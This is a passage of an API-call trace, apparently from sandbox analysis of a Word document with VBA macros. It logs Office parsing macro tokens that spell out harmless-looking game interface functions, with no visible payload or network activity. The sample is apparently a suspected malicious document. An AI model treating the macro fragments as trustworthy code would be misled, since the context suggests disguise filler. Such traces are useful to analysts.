lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", cchLength=0x27 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc") returned 0x27 [0030.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", cchWideChar=40, lpMultiByteStr=0x2e6230, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", lpUsedDefaultChar=0x0) returned 40 [0030.213] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned -4 [0030.213] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0 [0030.213] CExposedDocFile::AddRef () returned 0x6 [0030.213] CExposedDocFile::AddRef () returned 0x7 [0030.213] CExposedDocFile::OpenStream () returned 0x0 [0030.213] CExposedDocFile::Release () returned 0x6 [0030.213] CExposedStream::Seek () returned 0x0 [0030.213] CExposedStream::AddRef () returned 0x2 [0030.213] CExposedStream::Read () returned 0x0 [0030.213] CExposedStream::AddRef () returned 0x3 [0030.213] CExposedStream::Release () returned 0x2 [0030.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x2ee0) returned 0xb521550 [0030.213] CExposedStream::Read () returned 0x0 [0030.213] CExposedStream::Read () returned 0x0 [0030.213] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.213] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0030.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x7) returned 0xb4f60a0 [0030.213] IMalloc:Alloc (This=0x7fefe015380, cb=0xe) returned 0xb4904f0 [0030.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb4f60a0, cbMultiByte=7, lpWideCharStr=0xb4904f0, cchWideChar=7 | out: lpWideCharStr="Class1") returned 7 [0030.213] IMalloc:Free (This=0x7fefe015380, pv=0xb4f60a0) [0030.213] IMalloc:Free (This=0x7fefe015380, pv=0xb4904f0) [0030.213] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.213] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0030.214] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x76686d0 [0030.214] IMalloc:Alloc (This=0x7fefe015380, cb=0x50) returned 0x7809000 [0030.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x76686d0, cbMultiByte=40, lpWideCharStr=0x7809000, cchWideChar=40 | out: lpWideCharStr="0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}") returned 40 [0030.214] IMalloc:Alloc (This=0x7fefe015380, cb=0x50) returned 0x78090c0 [0030.214] IMalloc:Free (This=0x7fefe015380, pv=0x76686d0) [0030.214] IMalloc:Free (This=0x7fefe015380, pv=0x7809000) [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CheckRectsPlayerOpt") returned 0x102438 [0030.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50842, cbMultiByte=19, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0030.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50842, cbMultiByte=19, lpWideCharStr=0xb4e31c8, cchWideChar=19 | out: lpWideCharStr="CheckRectsPlayerOpt") returned 19 [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rTemp") returned 0x108997 [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RECT") returned 0x101d69 [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rMouse") returned 0x10ec1e [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RECT") returned 0x101d69 [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rMouse") returned 0x10ec1e [0030.215] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="rMouse" | out: _Dst="rMouse") returned 0x0 [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="g_cursorx") returned 0x1052bf [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Right") returned 0x10150d [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Top") returned 0x10da35 [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="g_cursory") returned 0x1052bc [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bottom") returned 0x107b48 [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Top") returned 0x10da35 [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.215] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PlayerOptR") returned 0x106b7b [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.215] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Or") returned 0x105e92 [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Not") returned 0x10ba23 [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Players") returned 0x10bb5d [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MeNum") returned 0x104c1b [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Admin") returned 0x10a886 [0030.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IntersectRect") returned 0x108b90 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rTemp") returned 0x108997 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PlayerOptR") returned 0x106b7b [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rMouse") returned 0x10ec1e [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CheckRectsPlayerOpt") returned 0x102438 [0030.216] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="CheckRectsPlayerOpt" | out: _Dst="CheckRectsPlayerOpt") returned 0x0 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.216] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Not") returned 0x10ba23 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Players") returned 0x10bb5d [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MeNum") returned 0x104c1b [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Admin") returned 0x10a886 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CheckRectsAd") returned 0x1024ec [0030.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50a8a, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0030.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50a8a, cbMultiByte=12, lpWideCharStr=0xb4e31c8, cchWideChar=12 | out: lpWideCharStr="CheckRectsAd") returned 12 [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Boolean") returned 0x10978e [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rTemp") returned 0x108997 [0030.217] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="rTemp" | out: _Dst="rTemp") returned 0x0 [0030.217] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="rTemp" | out: _Dst="rTemp") returned 0x0 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RECT") returned 0x101d69 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rTemp") returned 0x108997 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rMouse") returned 0x10ec1e [0030.217] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="rMouse" | out: _Dst="rMouse") returned 0x0 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RECT") returned 0x101d69 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rMouse") returned 0x10ec1e [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.217] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rMouse") returned 0x10ec1e [0030.217] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="rMouse" | out: _Dst="rMouse") returned 0x0 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="g_cursorx") returned 0x1052bf [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Right") returned 0x10150d [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Top") returned 0x10da35 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="g_cursory") returned 0x1052bc [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bottom") returned 0x107b48 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Top") returned 0x10da35 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IntersectRect") returned 0x108b90 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rTemp") returned 0x108997 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AdRect") returned 0x104255 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rMouse") returned 0x10ec1e [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CheckRectsAd") returned 0x1024ec [0030.217] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="CheckRectsAd" | out: _Dst="CheckRectsAd") returned 0x0 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CheckRectsNav") returned 0x1035f5 [0030.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50ae2, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0030.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50ae2, cbMultiByte=13, lpWideCharStr=0xb4e31c8, cchWideChar=13 | out: lpWideCharStr="CheckRectsNav") returned 13 [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rTemp") returned 0x108997 [0030.218] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="rTemp" | out: _Dst="rTemp") returned 0x0 [0030.218] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="rTemp" | out: _Dst="rTemp") returned 0x0 [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RECT") returned 0x101d69 [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rTemp") returned 0x108997 [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rMouse") returned 0x10ec1e [0030.218] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="rMouse" | out: _Dst="rMouse") returned 0x0 [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RECT") returned 0x101d69 [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rMouse") returned 0x10ec1e [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.218] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rMouse") returned 0x10ec1e [0030.218] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="rMouse" | out: _Dst="rMouse") returned 0x0 [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="g_cursorx") returned 0x1052bf [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Right") returned 0x10150d [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Top") returned 0x10da35 [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="g_cursory") returned 0x1052bc [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bottom") returned 0x107b48 [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Top") returned 0x10da35 [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.219] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NavRect") returned 0x10e742 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.219] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IntersectRect") returned 0x108b90 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rTemp") returned 0x108997 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NavRect") returned 0x10e742 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rMouse") returned 0x10ec1e [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CheckRectsNav") returned 0x1035f5 [0030.219] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="CheckRectsNav" | out: _Dst="CheckRectsNav") returned 0x0 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CheckRectsMenu4") returned 0x106611 [0030.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50b3a, cbMultiByte=15, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0030.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50b3a, cbMultiByte=15, lpWideCharStr=0xb4e31c8, cchWideChar=15 | out: lpWideCharStr="CheckRectsMenu4") returned 15 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rTemp") returned 0x108997 [0030.219] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="rTemp" | out: _Dst="rTemp") returned 0x0 [0030.219] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="rTemp" | out: _Dst="rTemp") returned 0x0 [0030.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RECT") returned 0x101d69 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rTemp") returned 0x108997 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rMouse") returned 0x10ec1e [0030.220] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="rMouse" | out: _Dst="rMouse") returned 0x0 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RECT") returned 0x101d69 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rMouse") returned 0x10ec1e [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.220] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rMouse") returned 0x10ec1e [0030.220] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="rMouse" | out: _Dst="rMouse") returned 0x0 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="g_cursorx") returned 0x1052bf [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Right") returned 0x10150d [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Top") returned 0x10da35 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="g_cursory") returned 0x1052bc [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bottom") returned 0x107b48 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Top") returned 0x10da35 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.220] 